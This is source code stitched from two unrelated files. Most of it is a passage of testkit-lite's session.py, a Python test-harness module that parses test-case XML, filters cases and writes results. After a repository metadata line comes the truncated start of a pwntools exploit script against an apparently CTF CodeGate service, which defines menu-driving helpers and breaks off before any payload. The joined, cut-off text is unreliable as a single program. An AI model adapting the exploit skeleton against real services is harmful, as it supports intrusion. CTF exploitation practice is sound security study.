parameters["exetype"] = tcase.get('execution_type')
case_detail_tmp.setdefault("case_id", tcase.get('id'))
case_detail_tmp.setdefault("purpose", tcase.get('purpose'))
case_detail_tmp.setdefault("order", str(case_order))
case_detail_tmp.setdefault("onload_delay", "3")
if parameters["location"] != '':
case_detail_tmp.setdefault("location", parameters["location"])
else:
case_detail_tmp.setdefault("location", "device")
if self.is_webdriver and tset.get("ui-auto") == 'bdd':
if tcase.find('description/bdd_test_script_entry') is not None:
tc_entry = tcase.find(
'description/bdd_test_script_entry').text
if not tc_entry:
tc_entry = ""
case_detail_tmp["entry"] = self.test_prefix + tc_entry
if tcase.find(
'description/bdd_test_script_entry').get('timeout'):
case_detail_tmp["timeout"] = tcase.find(
'description/bdd_test_script_entry'
).get('timeout')
if tcase.find(
'description/bdd_test_script_entry'
).get('test_script_expected_result'):
case_detail_tmp["expected_result"] = tcase.find(
'description/bdd_test_script_entry'
).get('test_script_expected_result')
else:
if tcase.find('description/test_script_entry') is not None:
tc_entry = tcase.find(
'description/test_script_entry').text
if not tc_entry:
tc_entry = ""
case_detail_tmp["entry"] = self.test_prefix + tc_entry
if tcase.find(
'description/test_script_entry').get('timeout'):
case_detail_tmp["timeout"] = tcase.find(
'description/test_script_entry'
).get('timeout')
if tcase.find(
'description/test_script_entry'
).get('test_script_expected_result'):
case_detail_tmp["expected_result"] = tcase.find(
'description/test_script_entry'
).get('test_script_expected_result')
if tcase.find(
'description/test_script_entry'
).get('location'):
case_detail_tmp["location"] = tcase.find(
'description/test_script_entry'
).get('location')
tc_refer_entry = ""
if tcase.find('description/refer_test_script_entry') is not None:
tc_refer_entry = tcase.find(
'description/refer_test_script_entry').text
case_detail_tmp["refer_entry"] = tc_refer_entry
case_detail_tmp['platform'] = self.platform
if tcase.find('description/refer_test_script_entry')is not None:
case_detail_tmp["refer_timeout"] = tcase.find(
'description/refer_test_script_entry').get('timeout')
if tcase.find('description/refer_test_script_entry')is not None:
case_detail_tmp["refer_expected_result"] = tcase.find(
'description/refer_test_script_entry').get('test_script_expected_result')
if tcase.find('description/refer_test_script_entry') is not None:
case_detail_tmp["refer_location"] = tcase.find(
'description/refer_test_script_entry').get('location')
if tcase.getiterator("step"):
for this_step in tcase.getiterator("step"):
step_detail_tmp = {}
step_detail_tmp.setdefault("order", "1")
step_detail_tmp["order"] = str(
this_step.get('order'))
if this_step.find("step_desc") is not None:
text = this_step.find("step_desc").text
if text is not None:
step_detail_tmp["step_desc"] = text
if this_step.find("expected") is not None:
text = this_step.find("expected").text
if text is not None:
step_detail_tmp["expected"] = text
step_tmp.append(step_detail_tmp)
case_detail_tmp['steps'] = step_tmp
if tcase.find('description/pre_condition') is not None:
text = tcase.find('description/pre_condition').text
if text is not None:
case_detail_tmp["pre_condition"] = text
if tcase.find('description/post_condition') is not None:
text = tcase.find('description/post_condition').text
if text is not None:
case_detail_tmp['post_condition'] = text
if tcase.get('onload_delay') is not None:
case_detail_tmp[
'onload_delay'] = tcase.get('onload_delay')
# Check performance test
if tcase.find('measurement') is not None:
measures = tcase.getiterator('measurement')
measures_array = []
for measure in measures:
measure_json = {}
measure_json['name'] = measure.get('name')
measure_json['file'] = measure.get('file')
measures_array.append(measure_json)
case_detail_tmp['measures'] = measures_array
case_tmp.append(case_detail_tmp)
case_order += 1
parameters.setdefault("cases", case_tmp)
if self.bdryrun:
parameters.setdefault("dryrun", True)
self.set_parameters = parameters
#add by yangx.zhou@intel.com, 2014.09.11
# if self.worker_name !=None and self.worker_name == 'webdriver':
# value = 'webdriver'
value = None
if parameters['type']!= None and self.worker_name == None:
# if parameters['type'] == 'script':
# value = 'default'
if parameters['type'] == 'androidunit':
value = 'androidunit'
#value ='default'
elif parameters['type'] == 'pyunit' :
value = 'pyunit'
elif parameters['type'] == 'nodeunit' :
value = 'nodeunit'
elif parameters['type'] == 'xcunit' :
value = 'xcunit'
elif parameters['type'] == 'iosuiauto' :
value = 'iosuiauto'
elif parameters['type'] == 'qunit':
value = 'default'
if value != None:
try:
exec "from testkitlite.engines.%s import TestWorker" %value
LOGGER.info("TestWorker is %s" %value)
except Exception as error:
#print 'path: ', os.getcwd()
raise TestEngineException(value)
else:
self.testworker = TestWorker(self.connector)
except IOError as error:
LOGGER.error("[ Error: fail to prepare cases parameters, "
"error: %s ]\n" % error)
return False
return True
def apply_filter(self, root_em):
""" apply filter """
rules = self.filter_rules
for tsuite in root_em.getiterator('suite'):
if rules.get('suite'):
if tsuite.get('name') not in rules['suite']:
root_em.remove(tsuite)
for tset in tsuite.getiterator('set'):
if rules.get('set'):
if tset.get('name') not in rules['set']:
tsuite.remove(tset)
for tsuite in root_em.getiterator('suite'):
for tset in tsuite.getiterator('set'):
# if there are capabilities ,do filter
if self.has_capability:
tset_status = self.__apply_capability_filter_set(tset)
if not tset_status:
tsuite.remove(tset)
continue
ui_auto_type = tset.get("ui-auto")
for tcase in tset.getiterator('testcase'):
#treat manual 'ui-auto' testcase as auto testcase
if self.is_webdriver and ui_auto_type:
tcase.set('execution_type', 'auto')
if not self.__apply_filter_case_check(tcase):
tset.remove(tcase)
else:
self.filter_ok = True
def __apply_filter_case_check(self, tcase):
"""filter cases"""
rules = self.filter_rules
for key in rules.iterkeys():
if key in ["suite", "set"]:
continue
# Check attribute
t_val = tcase.get(key)
if t_val:
if not t_val in rules[key]:
return False
else:
# Check sub-element
items = tcase.getiterator(key)
if items:
t_val = []
for i in items:
t_val.append(i.text)
if len(set(rules[key]) & set(t_val)) == 0:
return False
else:
return False
return True
def __apply_capability_filter_set(self, tset):
""" check the set required capability with self.capabilities """
for tcaps in tset.getiterator('capabilities'):
for tcap in tcaps.getiterator('capability'):
capname = None
capvalue = None
capname = tcap.get('name').lower()
if tcap.find('value') is not None:
capvalue = tcap.find('value').text
if capname in self.capabilities:
if capvalue is not None:
if capvalue != self.capabilities[capname]:
# if capability value is not equal ,remove the case
return False
else:
# if does not hava this capability ,remove case
return False
return True
# sdx@kooltux.org: parse measures returned by test script
# and insert in XML result
# see xsd/test_definition.xsd: measurementType
_MEASURE_ATTRIBUTES = ['name', 'value', 'unit',
'target', 'failure', 'power']
def __insert_measures(self, case, buf, pattern="###[MEASURE]###"):
""" get measures """
measures = self.__extract_measures(buf, pattern)
for measure in measures:
m_elm = etree.Element('measurement')
for key in measure:
m_elm.attrib[key] = measure[key]
case.append(m_elm)
def __extract_measures(self, buf, pattern):
"""
This function extracts lines from <buf> containing the defined
<pattern>. For each line containing the pattern, it extracts the
string to the end of line Then it splits the content in multiple
fields using the defined separator <field_sep> and maps the fields
to measurement attributes defined in xsd. Finally, a list containing
all measurement objects found in input buffer is returned
"""
out = []
for line in buf.split("\n"):
pos = line.find(pattern)
if pos < 0:
continue
measure = {}
elts = collections.deque(line[pos + len(pattern):].split(':'))
for k in self._MEASURE_ATTRIBUTES:
if len(elts) == 0:
measure[k] = ''
else:
measure[k] = elts.popleft()
# don't accept unnamed measure
if measure['name'] != '':
out.append(measure)
return out
def __init_com_module(self, testxml):
"""
send init test to com_module
if webapi test,com_module will start testkit-stub
else com_module send the test case to devices
"""
starup_prms = self.__prepare_starup_parameters(testxml)
# init stub and get the session_id
session_id = self.testworker.init_test(starup_prms)
if session_id == None:
LOGGER.error("[ Error: Initialization Error]")
return False
else:
self.set_session_id(session_id)
return True
def __prepare_starup_parameters(self, testxml):
""" prepare_starup_parameters """
starup_parameters = {}
LOGGER.info("[ preparing for startup options ]")
try:
parse_tree = etree.parse(testxml)
tsuite = parse_tree.getroot().getiterator('suite')[0]
tset = parse_tree.getroot().getiterator('set')[0]
#if tset.get("launcher") is not None:
# starup_parameters[OPT_LAUNCHER] = tset.get("launcher")
#else:
# starup_parameters[OPT_LAUNCHER] = tsuite.get("launcher")
if self.external_test is not None:
starup_parameters[OPT_LAUNCHER] = self.external_test
starup_parameters[OPT_EXTENSION] = self.external_test.split(' ')[0]
tp = tset.get('type')
if tp == "wrt":
starup_parameters[OPT_LAUNCHER] = self.external_test + " -iu"
starup_parameters[OPT_EXTENSION] = self.external_test
elif tp in ['js','qunit', 'ref']:
starup_parameters[OPT_LAUNCHER] = self.external_test
#print starup_parameters[OPT_LAUNCHER],'debug'
# if self.external_test is not None:
# starup_parameters[OPT_LAUNCHER] = self.external_test
# starup_parameters[OPT_EXTENSION] = self.external_test.split(' ')[0]
if tsuite.get("extension") is not None:
starup_parameters[OPT_EXTENSION] = tsuite.get("extension")
if tsuite.get("widget") is not None:
starup_parameters[OPT_WIDGET] = tsuite.get("widget")
starup_parameters[OPT_SUITE] = tsuite.get("name")
starup_parameters[OPT_SET] = tset.get("name")
starup_parameters[OPT_STUB] = self.stub_name
starup_parameters['platform'] = self.platform
starup_parameters[OPT_DEBUG] = self.debug
if self.resultfile:
debug_dir = DIRNAME(self.resultfile)
debug_name = os.path.splitext(BASENAME(self.resultfile))[0]
if not EXISTS(debug_dir):
os.makedirs(debug_dir)
else:
debug_dir = DIRNAME(testxml)
debug_name = os.path.splitext(BASENAME(testxml))[0]
starup_parameters[OPT_DEBUG_LOG] = JOIN(debug_dir, debug_name)
self.debug_log_file = starup_parameters[OPT_DEBUG_LOG] + '.dlog'
if self.rerun:
starup_parameters[OPT_RERUN] = self.rerun
if len(self.capabilities) > 0:
starup_parameters[OPT_CAPABILITY] = self.capabilities
# for webdriver
starup_parameters['target_platform'] = self.targetplatform
#starup_parameters['debugip'] = self.debugip
#starup_parameters['wd_url'] = self.wdurl
starup_parameters['set_type'] = self.set_parameters['type']
starup_parameters['set_exetype'] = self.set_parameters['exetype']
starup_parameters['session_dir'] = self.session_dir
starup_parameters['log_debug'] = self.debug
except IOError as error:
LOGGER.error(
"[ Error: prepare starup parameters, error: %s ]" % error)
return starup_parameters
def __check_test_status(self):
'''
get_test_status from com_module
check the status
if end ,return ture; else return False
'''
# check test running or end
# if the status id end return True ,else return False
session_status = self.testworker.get_test_status(self.session_id)
if not session_status == None:
if session_status["finished"] == "0":
progress_msg_list = session_status["msg"]
for line in progress_msg_list:
LOGGER.info(line)
return False
elif session_status["finished"] == "1":
return True
else:
LOGGER.error("[ session status error ,pls finalize test ]\n")
# return True to finished this set ,becasue server error
return True
def finalize_test(self, sessionid):
'''shut_down testkit-stub'''
try:
self.testworker.finalize_test(sessionid)
except Exception as error:
LOGGER.error("[ Error: fail to close webapi http server, "
"error: %s ]" % error)
def get_capability(self, file_name):
"""get_capability from file """
if file_name is None:
return True
capability_xml = file_name
capabilities = {}
try:
parse_tree = etree.parse(capability_xml)
root_em = parse_tree.getroot()
for tcap in root_em.getiterator('capability'):
capability = get_capability_form_node(tcap)
capabilities = dict(capabilities, **capability)
self.set_capability(capabilities)
return True
except IOError as error:
LOGGER.error(
"[ Error: fail to parse capability xml, error: %s ]" % error)
return False
def __write_set_result(self, testxmlfile, result):
"""
get the result JSON form com_module,
write them to orignal testxmlfile
"""
#print 'debug', set_result
# write the set_result to set_xml
set_result_xml = testxmlfile
# covert JOSN to python dict string
set_result = result
if 'resultfile' in set_result:
write_file_result(set_result_xml, set_result, self.debug_log_file)
else:
write_json_result(set_result_xml, set_result, self.debug_log_file)
def get_capability_form_node(capability_em):
''' splite capability key and value form element tree'''
tmp_key = ''
capability = {}
tcap = capability_em
if tcap.get("name"):
tmp_key = tcap.get("name").lower()
if tcap.get("type").lower() == 'boolean':
if tcap.get("support").lower() == 'true':
capability[tmp_key] = True
if tcap.get("type").lower() == 'integer':
if tcap.get("support").lower() == 'true':
if tcap.getiterator(
"value") and tcap.find("value").text is not None:
capability[tmp_key] = int(tcap.find("value").text)
if tcap.get("type").lower() == 'string':
if tcap.get("support").lower() == 'true':
if tcap.getiterator(
"value") and tcap.find("value").text is not None:
capability[tmp_key] = tcap.find("value").text
return capability
def get_version_info():
"""
get testkit tool version ,just read the version in VERSION file
VERSION file must put in /opt/testkit/lite/
"""
try:
config = ConfigParser.ConfigParser()
if platform.system() == "Linux":
config.read('/opt/testkit/lite/VERSION')
else:
version_file = os.path.join(sys.path[0], 'VERSION')
config.read(version_file)
version = config.get('public_version', 'version')
return version
except KeyError as error:
LOGGER.error(
"[ Error: fail to parse version info, error: %s ]\n" % error)
return ""
def replace_cdata(file_name):
""" replace some character"""
try:
abs_path = mktemp()
new_file = open(abs_path, 'w')
old_file = open(file_name)
for line in old_file:
line_temp = line.replace('<![CDATA', '<![CDATA')
new_file.write(line_temp.replace(']]>', ']]>'))
new_file.close()
old_file.close()
remove(file_name)
move(abs_path, file_name)
except IOError as error:
LOGGER.error("[ Error: fail to replace cdata in the result file, "
"error: %s ]\n" % error)
def extract_notes(buf, pattern):
"""util func to split lines in buffer, search for pattern on each line
then concatenate remaining content in output buffer"""
out = ""
for line in buf.split("\n"):
pos = line.find(pattern)
if pos >= 0:
out += line[pos + len(pattern):] + "\n"
return out
# sdx@kooltux.org: parse notes in buffer and insert them in XML result
def insert_notes(case, buf, pattern="###[NOTE]###"):
""" insert notes"""
desc = case.find('description')
if desc is None:
return
notes_elm = desc.find('notes')
if notes_elm is None:
notes_elm = etree.Element('notes')
desc.append(notes_elm)
if notes_elm.text is None:
notes_elm.text = extract_notes(buf, pattern)
else:
notes_elm.text += "\n" + extract_notes(buf, pattern)
def get_summary(start_time, end_time):
""" set summary node """
summary = etree.Element('summary')
summary.attrib['test_plan_name'] = "Empty test_plan_name"
start_at = etree.Element('start_at')
start_at.text = start_time
end_at = etree.Element('end_at')
end_at.text = end_time
summary.append(start_at)
summary.append(end_at)
summary.tail = "\n "
return summary
def write_file_result(set_result_xml, set_result, debug_log_file):
"""write xml result file"""
result_file = set_result['resultfile']
try:
test_tree = etree.parse(set_result_xml)
test_em = test_tree.getroot()
result_tree = etree.parse(result_file)
result_em = result_tree.getroot()
dubug_file = BASENAME(debug_log_file)
for result_suite in result_em.getiterator('suite'):
for result_set in result_suite.getiterator('set'):
for test_suite in test_em.getiterator('suite'):
for test_set in test_suite.getiterator('set'):
if result_set.get('name') == \
test_set.get('name'):
result_set.set("set_debug_msg", dubug_file)
test_suite.remove(test_set)
test_suite.append(result_set)
xml_data_string = etree.tostring(test_em, encoding="utf-8")
new_xml_data = str2xmlstr(xml_data_string)
new_test_em = etree.fromstring(new_xml_data)
test_tree._setroot(new_test_em)
test_tree.write(set_result_xml)
os.remove(result_file)
LOGGER.info("[ cases result saved to resultfile ]\n")
except OSError as error:
traceback.print_exc()
LOGGER.error(
"[ Error: fail to write cases result, error: %s ]\n" % error)
def __expand_subcases_bdd(tset, tcase, sub_num, result_msg):
sub_case_index = 1
if os.path.isdir(result_msg):
saved_result_dir = result_msg
case_result_list = sorted(os.listdir(saved_result_dir))
for case_result_name in case_result_list:
case_result_xml = "%s/%s" % (saved_result_dir, case_result_name)
parse_tree = etree.parse(case_result_xml)
root_em = parse_tree.getroot()
for testcase_node in root_em.getiterator('testcase'):
sub_case = copy.deepcopy(tcase)
sub_case.set("id", "/".join([tcase.get("id"), str(sub_case_index)]))
sub_case.set("purpose",
"/".join([tcase.get("purpose"),
testcase_node.get('classname'),
testcase_node.get('name')]))
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
stdout = etree.SubElement(result_info, "stdout")
stdout.text = "\n<![CDATA[\n%s\n]]>\n" % testcase_node.find('system-out').text.strip('\n')
result_status = testcase_node.get('status')
if result_status == 'passed':
actual_result.text = 'PASS'
elif result_status == 'failed':
actual_result.text = 'FAIL'
stderr = etree.SubElement(result_info, "stderr")
if testcase_node.find('error') is not None:
stderr.text = "\n<![CDATA[\n%s\n]]>\n" % testcase_node.find('error').text.strip('\n')
elif testcase_node.find('failure') is not None:
stderr.text = "\n<![CDATA[\n%s\n]]>\n" % testcase_node.find('failure').text.strip('\n')
else:
actual_result.text = 'BLOCK'
sub_case.set("result", actual_result.text)
sub_case_index += 1
tset.append(sub_case)
rmtree(result_msg)
for block_case_index in range(sub_case_index, sub_num + 1):
sub_case = copy.deepcopy(tcase)
sub_case.set("id", "/".join([tcase.get("id"), str(block_case_index)]))
sub_case.set("purpose",
"/".join([tcase.get("purpose"), str(block_case_index)]))
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = 'BLOCK'
if not os.path.isdir(result_msg):
stdout = etree.SubElement(result_info, "stdout")
stdout.text = result_msg
sub_case.set("result", actual_result.text)
tset.append(sub_case)
tset.remove(tcase)
def __expand_subcases(tset, tcase, sub_num, result_msg, detail=None):
sub_case_result = result_msg.split("[assert]")[1:]
if not detail:
for i in range(sub_num):
sub_case = copy.deepcopy(tcase)
sub_case.set("id", "/".join([tcase.get("id"), str(i+1)]))
sub_case.set("purpose", "/".join([tcase.get("purpose"), str(i+1)]))
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
stdout = etree.SubElement(result_info, "stdout")
if i < len(sub_case_result):
sub_info = sub_case_result[i].split('[message]')
if sub_info[0].find("[id]") == -1:
sub_case.set("result", sub_info[0].upper())
actual_result.text = sub_info[0].upper()
else:
sub_case_result_id = sub_info[0].split('[id]')
sub_case.set("result", sub_case_result_id[0].upper())
sub_case.set("purpose", "/".join([tcase.get("purpose"), sub_case_result_id[1]]))
actual_result.text = sub_case_result_id[0].upper()
stdout.text = sub_info[1]
else:
sub_case.set("result", "BLOCK")
actual_result.text = "BLOCK"
stdout.text = ""
tset.append(sub_case)
else:
for i in range(sub_num):
sub_case = copy.deepcopy(tcase)
sub_case.set("id", "/".join([tcase.get("id"), str(i+1)]))
sub_case.set("purpose", "/".join([tcase.get("purpose"), str(i+1)]))
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
stdout = etree.SubElement(result_info, "stdout")
#add 1392 co 1395,1396 --1399 tab
if i > len(detail) -1:
sub_case.set("result", "BLOCK")
actual_result.text = "BLOCK"
else:
sub_case.set("result", detail[i]['result'])
actual_result.text = detail[i]['result'].upper()
#actual_result.text = sub_info[0].upper()
stdout.text = detail[i]['stdout']
#stdout.text = sub_info[1]
# else:
# sub_case.set("result", "")
# actual_result.text = ""
# stdout.text = ""
tset.append(sub_case)
tset.remove(tcase)
def __expand_subcases_nodeunit(tset, tcase, sub_num, result_msg):
is_dir = os.path.isdir(result_msg)
if is_dir:
if not glob.glob("%s/*" % result_msg):
parent_case_id = tcase.get("id")
parent_case_purpose = tcase.get("purpose")
for i in range(sub_num):
sub_case = copy.deepcopy(tcase)
sub_case.set("id", "/".join([parent_case_id, str(i + 1)]))
sub_case.set("purpose", "/".join([parent_case_purpose, str(i + 1)]))
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = 'BLOCK'
stdout = etree.SubElement(result_info, "stdout")
stdout.text = result_msg
sub_case.set("result", actual_result.text)
tset.append(sub_case)
os.rmdir(result_msg)
else:
case_result_xml = glob.glob("%s/*" % result_msg)[0]
parse_tree = etree.parse(case_result_xml)
tc_list = parse_tree.getiterator('testcase')
parent_case_id = tcase.get("id")
parent_case_purpose = tcase.get("purpose")
sub_case_index = 1
for tc in tc_list:
sub_case = copy.deepcopy(tcase)
tc_name = tc.get("name").lstrip("tests - ")
sub_case.set("id", "/".join([parent_case_id, tc_name]))
sub_case.set("purpose", "/".join([parent_case_purpose, str(sub_case_index)]))
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
failure_elem = ''
failure_elem = tc.find('failure')
if failure_elem is not None:
actual_result.text = 'FAIL'
stdout = etree.SubElement(result_info, "stdout")
stdout.text = failure_elem.text.strip('\n')
else:
if not tc.getchildren():
actual_result.text = 'PASS'
else:
actual_result.text = 'BLOCK'
sub_case.set("result", actual_result.text)
sub_case_index += 1
tset.append(sub_case)
rmtree(result_msg)
else:
parent_case_id = tcase.get("id")
parent_case_purpose = tcase.get("purpose")
for i in range(sub_num):
sub_case = copy.deepcopy(tcase)
sub_case.set("id", "/".join([parent_case_id, str(i + 1)]))
sub_case.set("purpose", "/".join([parent_case_purpose, str(i + 1)]))
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = 'BLOCK'
stdout = etree.SubElement(result_info, "stdout")
stdout.text = result_msg
sub_case.set("result", actual_result.text)
tset.append(sub_case)
tset.remove(tcase)
def __write_by_caseid_pyunit(tset, case_results):
index = 0
for tcase in tset.getiterator('testcase'):
if not tcase.get("subcase") or tcase.get("subcase") == "1":
if tcase.find("./result_info") is not None:
tcase.remove(tcase.find("./result_info"))
result_info = etree.SubElement(tcase, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
case_result = case_results[index]
actual_result.text = case_result['result']
tcase.set("result", actual_result.text)
if 'start_at' in case_result:
start = etree.SubElement(result_info, "start")
start.text = case_result['start_at']
if 'end_at' in case_result:
end = etree.SubElement(result_info, "end")
end.text = case_result['end_at']
if 'stdout' in case_result:
stdout = etree.SubElement(result_info, "stdout")
stdout.text = case_result['stdout']
index += 1
else:
parent_case_id = tcase.get("id")
parent_case_purpose = tcase.get("purpose")
total_sub_case = int(tcase.get("subcase"))
result_len = len(case_results)
for sub_case_index in range(total_sub_case):
if index < result_len:
case_result = case_results[index]
sub_case = copy.deepcopy(tcase)
sub_case.set("id", "/".join([parent_case_id, str(sub_case_index + 1)]))
sub_case.set("purpose", "/".join([parent_case_purpose, case_result['case_id']]))
if sub_case.find("./result_info") is not None:
sub_case.remove(sub_case.find("./result_info"))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = case_result['result']
sub_case.set("result", actual_result.text)
if 'start_at' in case_result:
start = etree.SubElement(result_info, "start")
start.text = case_result['start_at']
if 'end_at' in case_result:
end = etree.SubElement(result_info, "end")
end.text = case_result['end_at']
if 'stdout' in case_result:
stdout = etree.SubElement(result_info, "stdout")
stdout.text = case_result['stdout']
tset.append(sub_case)
index += 1
tset.remove(tcase)
def __write_by_caseid(tset, case_results):
tset.set("set_debug_msg", "N/A")
ui_auto_type = tset.get('ui-auto')
for tcase in tset.getiterator('testcase'):
for case_result in case_results:
if tcase.get("id") == case_result['case_id']:
tcase.set('result', case_result['result'].upper())
# Check performance test
if tcase.find('measurement') is not None:
for measurement in tcase.getiterator(
'measurement'):
if 'measures' in case_result:
m_results = case_result['measures']
for m_result in m_results:
if measurement.get('name') == \
m_result['name'] and 'value' in m_result:
measurement.set(
'value', m_result[
'value'])
if tcase.find("./result_info") is not None:
tcase.remove(tcase.find("./result_info"))
result_info = etree.SubElement(tcase, "result_info")
actual_result = etree.SubElement(
result_info, "actual_result")
actual_result.text = case_result['result'].upper()
start = etree.SubElement(result_info, "start")
end = etree.SubElement(result_info, "end")
stdout = etree.SubElement(result_info, "stdout")
stderr = etree.SubElement(result_info, "stderr")
if 'start_at' in case_result:
start.text = case_result['start_at']
if 'end_at' in case_result:
end.text = case_result['end_at']
if not tcase.get("subcase") or tcase.get("subcase") == "1":
if not ui_auto_type or ui_auto_type == 'wd':
if 'stdout' in case_result:
stdout.text = case_result['stdout']
if 'stderr' in case_result:
stderr.text = case_result['stderr']
else:
if 'stdout' in case_result:
if EXISTS(case_result['stdout']):
saved_result_dir = case_result['stdout']
case_result_name = os.listdir(saved_result_dir)[0]
case_result_xml = "%s/%s" % (saved_result_dir, case_result_name)
parse_tree = etree.parse(case_result_xml)
root_em = parse_tree.getroot()
stdout.text = "\n<![CDATA[\n%s\n]]>\n" % root_em.find('testcase/system-out').text.strip('\n')
if case_result['result'].upper() == 'FAIL':
if root_em.find('testcase/error') is not None:
stderr.text = "\n<![CDATA[\n%s\n]]>\n" % root_em.find('testcase/error').text.strip('\n')
elif root_em.find('testcase/failure') is not None:
stderr.text = "\n<![CDATA[\n%s\n]]>\n" % root_em.find('testcase/failure').text.strip('\n')
rmtree(saved_result_dir)
else:
if 'stdout' in case_result:
sub_num = int(tcase.get("subcase"))
result_msg = case_result['stdout']
if ui_auto_type == 'bdd':
__expand_subcases_bdd(tset, tcase, sub_num, result_msg)
else:
if tset.get('type') == 'nodeunit':
__expand_subcases_nodeunit(tset, tcase, sub_num, result_msg)
else:
__expand_subcases(tset, tcase, sub_num, result_msg)
def __write_by_class(tset, case_results):
tset.set("set_debug_msg", "N/A")
for tcase in tset.getiterator('testcase'):
class_name = tcase.find('description/test_script_entry').text
case_result_by_class = case_results.get(class_name, None)
if case_result_by_class:
if not tcase.get("subcase") or tcase.get("subcase") == "1":
result_info = etree.SubElement(tcase, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
case_result = case_result_by_class[0]
actual_result.text = case_result['result'].upper()
tcase.set("result", actual_result.text)
start = etree.SubElement(result_info, "start")
end = etree.SubElement(result_info, "end")
stdout = etree.SubElement(result_info, "stdout")
stderr = etree.SubElement(result_info, "stderr")
if 'start_at' in case_result:
start.text = case_result['start_at']
if 'end_at' in case_result:
end.text = case_result['end_at']
if 'stdout' in case_result:
stdout.text = case_result['stdout']
if 'stderr' in case_result:
stderr.text = case_result['stderr']
else:
parent_case_id = tcase.get("id")
parent_case_purpose = tcase.get("purpose")
total_sub_case = int(tcase.get("subcase"))
result_len = len(case_result_by_class)
saved_total_sub_case = min(total_sub_case, result_len)
for sub_case_index in range(saved_total_sub_case):
case_result = case_result_by_class[sub_case_index]
sub_case = copy.deepcopy(tcase)
sub_case.set("id", ".".join([parent_case_id, case_result['case_id']]))
sub_case.set("purpose", "/".join([parent_case_purpose, str(sub_case_index + 1)]))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = case_result['result']
sub_case.set("result", actual_result.text)
if 'start_at' in case_result:
start = etree.SubElement(result_info, "start")
start.text = case_result['start_at']
if 'end_at' in case_result:
end = etree.SubElement(result_info, "end")
end.text = case_result['end_at']
if 'stdout' in case_result:
stdout = etree.SubElement(result_info, "stdout")
stdout.text = case_result['stdout']
if 'stderr' in case_result:
stderr = etree.SubElement(result_info, "stderr")
stderr.text = case_result['stderr']
tset.append(sub_case)
for other_sub_case_index in range(result_len, total_sub_case):
other_sub_case = copy.deepcopy(tcase)
other_sub_case.set("id", ".".join([parent_case_id, str(other_sub_case_index + 1)]))
other_sub_case.set("purpose", "/".join([parent_case_purpose, str(other_sub_case_index + 1)]))
result_info = etree.SubElement(other_sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = 'BLOCK'
other_sub_case.set("result", actual_result.text)
stdout = etree.SubElement(result_info, "stdout")
stderr = etree.SubElement(result_info, "stderr")
stderr.text = "No such '%s'" % class_name
tset.append(other_sub_case)
tset.remove(tcase)
else:
if not tcase.get("subcase") or tcase.get("subcase") == "1":
result_info = etree.SubElement(tcase, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = 'BLOCK'
tcase.set("result", actual_result.text)
stdout = etree.SubElement(result_info, "stdout")
stderr = etree.SubElement(result_info, "stderr")
stderr.text = "No such '%s'" % class_name
else:
parent_case_id = tcase.get("id")
parent_case_purpose = tcase.get("purpose")
subcase_no = int(tcase.get("subcase"))
for sub_case_index in range(subcase_no):
sub_case = copy.deepcopy(tcase)
sub_case.set("id", ".".join([parent_case_id, str(sub_case_index + 1)]))
sub_case.set("purpose", "/".join([parent_case_purpose, str(sub_case_index + 1)]))
result_info = etree.SubElement(sub_case, "result_info")
actual_result = etree.SubElement(result_info, "actual_result")
actual_result.text = 'BLOCK'
sub_case.set("result", actual_result.text)
stdout = etree.SubElement(result_info, "stdout")
stderr = etree.SubElement(result_info, "stderr")
stderr.text = "No such '%s'" % class_name
tset.append(sub_case)
tset.remove(tcase)
def sort_result(case_results):
total = dict()
for result in case_results:
if result['case_class'] in total:
total[result['case_class']].append(result)
else:
total[result['case_class']] = [result]
return total
def write_json_result(set_result_xml, set_result, debug_log_file):
''' fetch result form JSON'''
case_results = set_result["cases"]
try:
parse_tree = etree.parse(set_result_xml)
#print 'debug tree', debug_log_file
root_em = parse_tree.getroot()
dubug_file = BASENAME(debug_log_file)
for tset in root_em.getiterator('set'):
tset.set("set_debug_msg", dubug_file)
if tset.get('type') in ['pyunit', 'xcunit']:
__write_by_caseid_pyunit(tset, case_results)
elif tset.get('type') == 'androidunit':
total = sort_result(case_results)
__write_by_class(tset, total)
else:
__write_by_caseid(tset, case_results)
xml_data_string = etree.tostring(root_em, encoding="utf-8")
new_xml_data = str2xmlstr(xml_data_string)
new_root_em = etree.fromstring(new_xml_data)
parse_tree._setroot(new_root_em)
parse_tree.write(set_result_xml)
LOGGER.info("[ cases result saved to resultfile ]\n")
except IOError as error:
traceback.print_exc()
LOGGER.error(
"[ Error: fail to write cases result, error: %s ]\n" % error)
|
Shao-Feng/testkit-lite
|
testkitlite/util/session.py
|
Python
|
gpl-2.0
| 86,792
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import time
host = "10.211.55.6"
port = 8888
host = "ch41l3ng3s.codegate.kr"
port = 3333
r = remote(host,port)
def sell(idx):
r.recvuntil(">>")
r.sendline("S")
r.recvuntil(">>")
r.sendline(str(idx))
r.recvuntil("?")
r.sendline("S")
def buy(size,name,pr):
r.recvuntil(">>")
r.sendline("B")
r.recvuntil(">>")
r.sendline(str(size))
r.recvuntil(">>")
r.sendline("P")
r.recvuntil(">>")
r.sendline(name)
r.recvuntil(">>")
r.sendline(pr)
def view(idx,profile=None):
r.recvuntil(">>")
r.sendline("V")
